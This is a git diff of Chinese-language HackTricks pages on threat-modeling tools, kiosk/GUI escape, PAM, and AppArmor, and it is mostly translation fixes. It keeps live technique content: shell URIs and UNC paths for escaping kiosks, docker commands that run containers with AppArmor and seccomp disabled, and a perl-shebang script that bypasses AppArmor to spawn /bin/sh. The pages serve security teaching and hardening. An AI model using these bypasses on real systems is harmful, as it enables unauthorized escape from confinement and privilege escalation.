5. **VAST**(视觉、敏捷和简单威胁建模):这种方法旨在更易于访问,并集成到敏捷开发环境中。它结合了其他方法的元素,侧重于**威胁的视觉表示**。
6. **OCTAVE**运营关键威胁、资产和漏洞评估由CERT协调中心开发该框架旨在进行**组织风险评估而不是特定系统或软件**。
## 工具
有几种工具和软件解决方案可用于帮助创建和管理威胁模型。以下是您可能考虑的一些工具。
有几种可用的工具和软件解决方案可**帮助**创建和管理威胁模型。以下是您可能考虑的一些工具。
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
一款先进的跨平台、多功能GUI网络蜘蛛/爬虫,适用于网络安全专业人。Spider Suite可用于攻击面映射和分析。
一款先进的跨平台、多功能GUI网络蜘蛛/爬虫,适用于网络安全专业人。Spider Suite可用于攻击面映射和分析。
**用法**
@ -66,7 +66,7 @@ CIA三元组是信息安全领域中广泛认可的模型代表机密性、
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
来自OWASP的开源项目Threat Dragon是一个包含系统图和规则引擎以自动生成威胁/缓解措施的Web和桌面应用程序。
来自OWASP的开源项目Threat Dragon是一个包含系统图和规则引擎以自动生成威胁/缓解措施的Web和桌面应用程序。
**用法**
@ -88,7 +88,7 @@ CIA三元组是信息安全领域中广泛认可的模型代表机密性、
4. 创建您的模型
您可以使用SpiderSuite爬虫等工具来获得灵感一个基本模型可能看起来像这样
您可以使用SpiderSuite爬虫等工具来获得灵感一个基本模型可能如下所示
<figure><img src="../.gitbook/assets/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
@ -98,7 +98,7 @@ CIA三元组是信息安全领域中广泛认可的模型代表机密性、
* 演员(人员,如网站访问者、用户或管理员)
* 数据流线(交互指示器)
* 信任边界(不同的网络段或范围。)
* 存储(数据存储的地方,如数据库)
* 存储(存储数据的地方,如数据库)
5. 创建威胁步骤1
@ -116,7 +116,7 @@ CIA三元组是信息安全领域中广泛认可的模型代表机密性、
6. 完成
现在您完成的模型应该看起来像这样。这就是您如何使用OWASP Threat Dragon制作简单的威胁模型。
现在您完成的模型应该看起来像这样。这就是您如何使用OWASP Threat Dragon创建简单的威胁模型。
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
### [Microsoft威胁建模工具](https://aka.ms/threatmodelingtool)
@ -124,9 +124,9 @@ CIA三元组是信息安全领域中广泛认可的模型代表机密性、
这是微软提供的免费工具可帮助在软件项目的设计阶段发现威胁。它使用STRIDE方法论特别适用于在微软平台上开发的人员。
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。

68
hardware-physical-access/escaping-from-gui-applications.md
View file

@ -4,19 +4,19 @@
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -28,7 +28,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
# 检查GUI应用程序内的可能操作
**常见对话框**是那些**保存文件**、**打开文件**、选择字体、颜色等选项。大多数情况下,这些对话框将**提供完整的资源管理器功能**。这意味着如果您可以访问这些选项,则可以访问资源管理器功能:
**常见对话框**是那些**保存文件**、**打开文件**、选择字体、颜色等选项。大多数情况下,这些选项将**提供完整的资源管理器功能**。这意味着如果您可以访问这些选项,则可以访问资源管理器功能:
* 关闭/关闭为
* 打开/打开方式
@ -67,7 +67,7 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
* 隐藏的管理菜单CTRL-ALT-F8CTRL-ESC-F9
* **Shell URI**_shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
* **UNC路径**连接到共享文件夹的路径。您应该尝试连接到本地计算机的C$"\\\127.0.0.1\c$\Windows\System32"
* **更多UNC路径:**
* **更多UNC路径**
| UNC | UNC | UNC |
| ------------------------- | -------------- | -------------------- |
@ -186,7 +186,7 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
* 用五个手指捏屏幕/触摸主页按钮/从屏幕底部向上快速滑动一个手指:访问主屏幕
* 用一个手指从屏幕底部向缓慢滑动1-2英寸会出现底栏
* 用一个手指从屏幕底部向缓慢滑动1-2英寸会出现底栏
* 用一个手指从屏幕顶部向下滑动:查看通知
@ -196,28 +196,28 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
* 用一个手指快速从屏幕中心向左或向右滑动:切换到下一个/上一个应用程序
* 按住iPad右上角的开/关/睡眠按钮并将“滑动以关机”滑块全部向右动:关机
* 按住iPad右上角的开/关/睡眠按钮并将“滑动以关机”滑块全部向右动:关机
* 按住iPad右上角的开/关/睡眠按钮和主页按钮几秒钟:强制硬关机
* 快速按下iPad右上角的开/关/睡眠按钮和主页按钮:拍摄屏幕截图,截图将弹出在显示屏左下角。同时短两个按钮,如果您按住几秒钟,将执行强制关机。
* 快速按下iPad右上角的开/关/睡眠按钮和主页按钮:拍摄屏幕截图,截图将弹出在显示屏左下角。同时短按两个按钮,如果您按住几秒钟,将执行关机。
## 快捷键
您应该有一个iPad键盘或USB键盘适配器。这里只显示可帮助退出应用程序的快捷键。
| 键 | 名称 |
| 键 | 名称 |
| --- | ------------ |
| ⌘ | 命令 |
| ⌥ | 选项Alt |
| ⌘ | Command |
| ⌥ | Option (Alt) |
| ⇧ | Shift |
| ↩ | 返回 |
| ↩ | Return |
| ⇥ | Tab |
| ^ | 控制 |
| ← | 左箭头 |
| → | 右箭头 |
| ↑ | 上箭头 |
| ↓ | 下箭头 |
| ^ | Control |
| ← | Left Arrow |
| → | Right Arrow |
| ↑ | Up Arrow |
| ↓ | Down Arrow |
### 系统快捷键
@ -225,33 +225,33 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
| 快捷键 | 动作 |
| -------- | ------------------------------------------------------------------------------ |
| F1 | 降低屏幕亮度 |
| F2 | 增加屏幕亮度 |
| F1 | 调暗屏幕 |
| F2 | 调亮屏幕 |
| F7 | 后退一首歌 |
| F8 | 播放/暂停 |
| F9 | 跳过歌曲 |
| F10 | 静音 |
| F11 | 降低音量 |
| F12 | 增加音量 |
| ⌘ 空格 | 显示可用语言列表;要选择一个,再次点击空格键。 |
| ⌘ Space | 显示可用语言列表;要选择一种语言,请再次点击空格键。 |
### iPad 导航
| 快捷键 | 动作 |
| -------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | 前往主屏幕 |
| ⌘⇧H (Command-Shift-H) | 前往主屏幕 |
| ⌘H | 转到主屏幕 |
| ⌘⇧H (Command-Shift-H) | 转到主屏幕 |
| ⌘ (Space) | 打开Spotlight |
| ⌘⇥ (Command-Tab) | 列出最近使用的十个应用程序 |
| ⌘\~ | 转到上一个应用程序 |
| ⌘⇧3 (Command-Shift-3) | 截图(悬停在左下角以保存或对其进行操作) |
| ⌘⇧4 | 截图并在编辑器中打开 |
| 按住⌘ | 应用程序可用快捷键列表 |
| 按住⌘ | 应用程序可用快捷键列表 |
| ⌘⌥D (Command-Option/Alt-D) | 弹出底栏 |
| ^⌥H (Control-Option-H) | 主页按钮 |
| ^⌥H H (Control-Option-H-H) | 显示多任务栏 |
| ^⌥I (Control-Option-i) | 项目选择器 |
| 退出 | 返回按钮 |
| Escape | 返回按钮 |
| → (右箭头) | 下一个项目 |
| ← (左箭头) | 上一个项目 |
| ↑↓ (上箭头, 下箭头) | 同时点击选定的项目 |
@ -262,7 +262,7 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
| ⌘⇧⇥ (Command-Shift-Tab) | 切换到上一个应用程序 |
| ⌘⇥ (Command-Tab) | 切换回原始应用程序 |
| ←+→, 然后Option + ← 或 Option+→ | 通过底栏导航 |
### Safari快捷键
### Safari shortcuts
| 快捷键 | 动作 |
| ----------------------- | ------------------------------------------------ |
@ -277,9 +277,9 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
| ⌘⇧T (Command-Shift-T) | 打开最后关闭的标签(可多次使用) |
| ⌘\[ | 在浏览历史记录中返回一页 |
| ⌘] | 在浏览历史记录中前进一页 |
| ⌘⇧R | 激活阅读模式 |
| ⌘⇧R | 激活阅读模式 |
### 邮件快捷键
### Mail shortcuts
| 快捷键 | 动作 |
| -------------------------- | ---------------------------- |
@ -290,7 +290,7 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
| ⌘. | 停止加载当前标签 |
| ⌘⌥F (Command-Option/Alt-F) | 在邮箱中搜索 |
# 参考资料
# References
* [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
* [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
@ -298,11 +298,11 @@ _bash, sh, zsh..._ 更多信息请查看:[https://gtfobins.github.io/](https:/
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一款由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -318,7 +318,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

38
linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
View file

@ -4,21 +4,21 @@
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,12 +28,12 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## 基本信息
**PAM可插拔认证模块**充当一个安全机制,**验证试图访问计算机服务的用户的身份**,根据各种标准控制他们的访问。它类似于数字看门人,确保只有授权用户可以与特定服务互动,同时可能限制其使用以防止系统超载。
**PAM可插拔认证模块**充当一个安全机制,**验证试图访问计算机服务的用户的身份**,根据各种标准控制他们的访问。它类似于数字看门人,确保只有经过授权用户可以与特定服务互动,同时可能限制其使用以防止系统超载。
### 配置文件
- **Solaris和基于UNIX的系统**通常使用位于`/etc/pam.conf`的中央配置文件。
- **Linux系统**更倾向于采用目录方式,在`/etc/pam.d`中存储特定于服务的配置。例如,登录服务的配置文件位于`/etc/pam.d/login`。
- **Linux系统**更倾向于采用目录方式,将特定于服务的配置存储在`/etc/pam.d`中。例如,登录服务的配置文件位于`/etc/pam.d/login`。
登录服务的PAM配置示例可能如下所示
```text
@ -68,21 +68,21 @@ session required /lib/security/pam_unix_session.so
### 示例场景
在具有多个auth模块的设置中程遵循严格顺序。如果`pam_securetty`模块发现登录终端未经授权则会阻止root登录但由于其“required”状态所有模块仍会被处理。`pam_env`设置环境变量,可能有助于用户体验。`pam_ldap`和`pam_unix`模块一起工作来认证用户,其中`pam_unix`尝试使用先前提供的密码,增强了认证方法的效率和灵活性。
在具有多个auth模块的设置中程遵循严格顺序。如果`pam_securetty`模块发现登录终端未经授权则会阻止root登录但由于其“required”状态所有模块仍会被处理。`pam_env`设置环境变量,可能有助于用户体验。`pam_ldap`和`pam_unix`模块共同工作以对用户进行身份验证,其中`pam_unix`尝试使用先前提供的密码,增强了认证方法的效率和灵活性。
## 参考资料
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**损害**。
[**WhiteIntel**](https://whiteintel.io)是一个以**暗网**为动力的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**损害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以在以下网站检查并免费尝试他们的引擎:
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
@ -93,10 +93,10 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

76
linux-hardening/privilege-escalation/docker-security/apparmor.md
View file

@ -4,21 +4,21 @@
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
其他支持HackTricks的方式
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
@ -30,26 +30,26 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
## 基本信息
AppArmor是一个**内核增强程序,旨在通过每个程序的配置文件限制程序可用的资源**有效地实现强制访问控制MAC将访问控制属性直接绑定到程序而不是用户。该系统通过**将配置文件加载到内核中**来运行,通常在启动时进行,这些配置文件规定了程序可以访问的资源,例如网络连接、原始套接字访问和文件权限。
AppArmor是一个**内核增强程序,旨在通过每个程序的配置文件限制程序可用的资源**有效地实现强制访问控制MAC将访问控制属性直接绑定到程序而不是用户。该系统通过**在内核中加载配置文件**来运行,通常在启动时加载,这些配置文件指定程序可以访问的资源,如网络连接、原始套接字访问和文件权限。
AppArmor配置文件有两种操作模式
- **强制模式**:该模式积极执行配置文件中定义的策略,阻止违反这些策略的操作,并通过诸如syslog或auditd等系统记录任何试图违反这些策略的尝试
- **强制模式**:该模式积极执行配置文件中定义的策略,阻止违反这些策略的操作,并记录任何试图违反这些策略的尝试,例如通过syslog或auditd等系统。
- **投诉模式**:与强制模式不同,投诉模式不会阻止违反配置文件策略的操作。相反,它将这些尝试记录为策略违规,而不强制执行限制。
### AppArmor组件
### AppArmor的组成部分
- **内核模块**:负责执行策略。
- **策略**:指定程序行为和资源访问的规则和限制。
- **解析器**:将策略加载到内核以执行或报告。
- **解析器**:将策略加载到内核以执行或报告。
- **实用程序**这些是用户模式程序提供与AppArmor交互和管理的接口。
### 配置文件路径
AppArmor配置文件通常保存在_**/etc/apparmor.d/**_\
使用`sudo aa-status`命令,您将能够列出受某个配置文件限制的二进制文件。如果您可以将每个列出的二进制文件的路径中的斜杠“/”更改为一个您将获得所提到文件夹中AppArmor配置文件的名称。
AppArmor配置文件通常保存在_**/etc/apparmor.d/**_目录下\
使用`sudo aa-status`命令,您将能够列出受某个配置文件限制的二进制文件。如果您可以将每个列出的二进制文件的路径中的斜杠“/”更改为点您将获得所提到文件夹中AppArmor配置文件的名称。
例如_usr/bin/man_的**apparmor**配置文件将位于_/etc/apparmor.d/usr.bin.man_中
例如_usr/bin/man_的**AppArmor**配置文件将位于_/etc/apparmor.d/usr.bin.man_中
### 命令
```bash
@ -70,11 +70,11 @@ aa-mergeprof #used to merge the policies
* **m**(内存映射为可执行文件)
* **k**(文件锁定)
* **l**(创建硬链接)
* **ix**(使用新程序继承策略执行另一个程序)
* **Px**(在清理环境后在另一个配置文件下执行)
* **Cx**(在清理环境后在子配置文件下执行)
* **Ux**(在清理环境后执行无限制操作
* **变量**可以在配置文件中定义,并可以从配置文件外部进行操作。例如:@{PROC} 和 @{HOME}(在配置文件中添加 #include \<tunables/global>
* **ix**(使用新程序执行另一个程序,并继承策略
* **Px**(在清理环境后,使用另一个配置文件执行)
* **Cx**(在清理环境后,使用子配置文件执行)
* **Ux**(在清理环境后,执行无限制,
* **变量**可以在配置文件中定义,并可以从配置文件外部进行操作。例如:@{PROC} 和 @{HOME}(在配置文件中添加 #include \<tunables/global>
* **拒绝规则支持覆盖允许规则**
### aa-genprof
@ -122,7 +122,7 @@ sudo aa-easyprof /path/to/binary
}
```
{% hint style="info" %}
请注意,默认情况下,在创建的配置文件中,什么都不允许,因此一切都被拒绝。您需要添加类似 `/etc/passwd r,` 这样的行来允许例如二进制文件读取 `/etc/passwd`
请注意,默认情况下,在创建的配置文件中,什么都不允许,因此一切都被拒绝。您需要添加类似 `/etc/passwd r,` 这样的行来允许二进制文件读取 `/etc/passwd`
{% endhint %}
然后,您可以使用以下命令**强制执行**新配置文件:
@ -131,7 +131,7 @@ sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
### 从日志修改配置文件
以下工具将读取日志,并询问用户是否允许一些检测到的禁止操作:
以下工具将读取日志,并询问用户是否允许一些检测到的禁止操作:
```bash
sudo aa-logprof
```
@ -149,7 +149,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
```
## 日志
来自 _/var/log/audit/audit.log_ **AUDIT****DENIED** 日志示例,针对可执行文件 **`service_bin`**
来自可执行文件 **`service_bin`** 的 _/var/log/audit/audit.log_ **AUDIT****DENIED** 日志示例:
```bash
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
@ -194,12 +194,12 @@ docker-default
**docker-default profile 摘要**
- 允许访问所有**网络**
- 对所有**网络**的**访问**
- 没有定义**任何权限**(但是,一些权限将来自于包含基本基础规则,即 #include \<abstractions/base>
- **不允许**写入任何 **/proc** 文件
- 其他 /**proc** 和 /**sys** 的**子目录**/**文件** **拒绝**读取/写入/锁定/链接/执行访问
- **不允许**挂载
- **Ptrace** 只能在由**相同的 apparmor profile** 限制的进程上运行
- 其他 /**proc** 和 /**sys** 的**子目录**/**文件****拒绝**读取/写入/锁定/链接/执行访问
- **不允许** **挂载**
- **Ptrace** 只能在受**相同 apparmor profile 限制**的进程上运行
一旦您**运行一个 docker 容器**,您应该看到以下输出:
```bash
@ -212,11 +212,11 @@ docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin
echo "" > /proc/stat
sh: 1: cannot create /proc/stat: Permission denied
```
您需要**禁用AppArmor**以绕过其限制:
你需要**禁用 apparmor** 来绕过其限制:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
请注意,默认情况下**AppArmor**也会**禁止容器从内部挂载**文件夹即使具有SYS_ADMIN权限也是如此
请注意,默认情况下**AppArmor**也会**禁止容器从内部挂载**文件夹即使具有SYS_ADMIN权限也不行
请注意您可以向docker容器**添加/删除****权限**(这仍将受到诸如**AppArmor**和**Seccomp**之类的保护方法的限制):
@ -225,7 +225,7 @@ docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-
- `--cap-drop=ALL --cap-add=SYS_PTRACE` 撤销所有权限,仅给予`SYS_PTRACE`权限
{% hint style="info" %}
通常,当您**发现**在**docker**容器**内**有**特权权限**可用,但某些**利用**的部分**无法正常工作**时,这是因为docker的**apparmor会阻止**它。
通常,当您**发现**在**docker**容器**内**有**特权权限**可用,但某些**利用**的部分**无法正常工作**时,这可能是因为docker的**apparmor在阻止**它。
{% endhint %}
### 示例
@ -236,7 +236,7 @@ docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-
```
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
```
要激活配置文件,我们需要执行以下操作:
要激活配置文件,我们需要执行以下操作:
```
sudo apparmor_parser -r -W mydocker
```
@ -268,7 +268,7 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
### AppArmor Shebang Bypass
在[**这个漏洞**](https://bugs.launchpad.net/apparmor/+bug/1911431)中你可以看到一个例子即使你正在阻止perl使用某些资源运行如果你只是创建一个shell脚本在第一行**指定**`#!/usr/bin/perl`,然后**直接执行该文件**,你就可以执行任何你想要的东西。例如:
在[**这个漏洞**](https://bugs.launchpad.net/apparmor/+bug/1911431)中你可以看到一个例子即使你正在阻止perl使用某些资源运行如果你只是创建一个shell脚本在第一行**`#!/usr/bin/perl`**指定,然后**直接执行该文件**,你将能够执行任何你想要的东西。例如:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -278,13 +278,13 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
